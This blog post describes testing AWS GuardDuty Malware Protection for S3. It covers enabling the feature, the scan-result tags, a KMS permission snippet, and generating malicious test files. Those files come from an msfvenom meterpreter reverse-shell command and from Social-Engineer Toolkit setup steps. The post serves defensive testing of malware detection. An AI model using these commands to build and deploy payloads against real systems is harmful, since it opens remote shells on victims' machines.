DEV Community

mgbec
mgbec

Posted on • Originally published at Medium on

Where Danger Lives- Scanning Untrusted Uploads to S3

#aws #s3 #incidentresponse #awsguardduty

Prior to the introduction of GuardDuty Malware Scanning for S3, detecting malicious objects in S3 uploads was something AWS customers needed to architect themselves. A typical workflow would look something like this:

https://aws.amazon.com/blogs/apn/integrating-amazon-s3-malware-scanning-into-your-application-workflow-with-cloud-storage-security/. The available scanning engines were ClamAV and Sophos.

With the introduction of GuardDuty Malware Scanning for S3, https://docs.aws.amazon.com/guardduty/latest/ug/gdu-malware-protection-s3.html, customers have a managed service available to use. Some of the useful components of this service are options for automatic tagging, sending events to CloudWatch, and creating actions based on alerts. So let’s test it out!

You can turn on GuardDuty Malware Protection for S3 only, but I chose to turn on GuardDuty too. This is a newer account and it was not already turned on.

I turned it on in a fresh, empty bucket and turned on tagging. The tags available are:

  • NO_THREATS_FOUND — GuardDuty detected no potential threat associated with the scanned object.
  • THREATS_FOUND — GuardDuty detected a potential threat associated with the scanned object.
  • UNSUPPORTED — There are a few reasons why Malware Protection for S3 will skip a scan. Potential reasons include password-protected file, Malware Protection for S3 quotas, and certain Amazon S3 features. For more information, see Capabilities of Malware Protection for S3.
  • ACCESS_DENIED — GuardDuty can’t access this object for scanning. Check the IAM role permissions associated with this bucket.
  • FAILED — GuardDuty can’t perform malware scan on this object because of an internal error.

You’ll also need to set up permissions and a trust relationship for the scan actions. The View permissions section shown above will specify exactly how it should be set up. You can attach these to an existing role or a new one. You’ll need to replace the key id in this section (use with your customer managed key ID. If your bucket is encrypted by using an AWS KMS key, replace the placeholder value below with an *):

"Sid": "AllowDecryptForMalwareScan", "Effect": "Allow", "Action": [ "kms:GenerateDataKey", "kms:Decrypt" ], "Resource": "arn:aws:kms:us-east-1:111122223333:key/APKAEIBAERJR2EXAMPLE", "Condition": { "StringLike": { "kms:ViaService": "s3.us-east-1.amazonaws.com"
Enter fullscreen mode Exit fullscreen mode

Now it’s time to be evil. I used a few different tools to create malicious files.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.222 LPORT=4467 -f exe > reverse.exe

git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/ cd setoolkit pip3 install -r requirements.txt python setup.py
Enter fullscreen mode Exit fullscreen mode

Once it is up and running, you have many options to create something pernicious.

Once I had an assortment of malicious files, I uploaded them into my S3 bucket:

The malicious files were promptly tagged.

GuardDuty showed them in Findings, with additional details on the specific threat found:

They showed up in CloudWatch Metrics:

Next steps:

Thanks for reading and stay safe out there!

Top comments (0)